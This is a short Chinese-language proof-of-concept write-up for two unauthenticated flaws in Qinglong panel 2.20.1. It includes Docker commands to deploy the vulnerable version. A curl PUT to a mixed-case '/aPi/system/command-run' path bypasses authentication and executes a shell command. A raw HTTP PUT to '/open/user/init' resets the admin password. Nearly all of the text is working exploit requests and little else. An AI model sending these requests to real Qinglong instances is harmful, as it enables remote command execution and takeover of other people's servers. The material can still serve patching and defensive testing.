青龙面板
未授权 RCE
漏洞描述
青龙面板**2.20.1**版本存在一处鉴权漏洞,使用大小写 **aPi绕过接口鉴权,可直接对接口/aPi/system/command-run**造成命令执行
环境部署
拉取 Docker 镜像
docker pull whyour/qinglong:2.20.1
部署容器
docker run -dit \
-v $PWD/ql/data:/ql/data \
-p 5700:5700 \
-e QlBaseUrl="/" \
-e QlPort="5700" \
--name qinglong \
--hostname qinglong \
--restart unless-stopped \
whyour/qinglong:2.20.1
漏洞利用
curl -X PUT "http://192.168.31.155:5700/aPi/system/command-run" \
-H "Content-Type: application/json" \
-d '{"command": "id"}'
未授权重置用户密码
≤2.20.1
2.17.11 可以,再低的没测
漏洞利用
PUT /open/user/init HTTP/1.1
Host: 192.168.31.155:5700
Content-Type: application/json
Content-Length: 65
{
"username": "admin",
"password": "pwnedbywebdxg"
}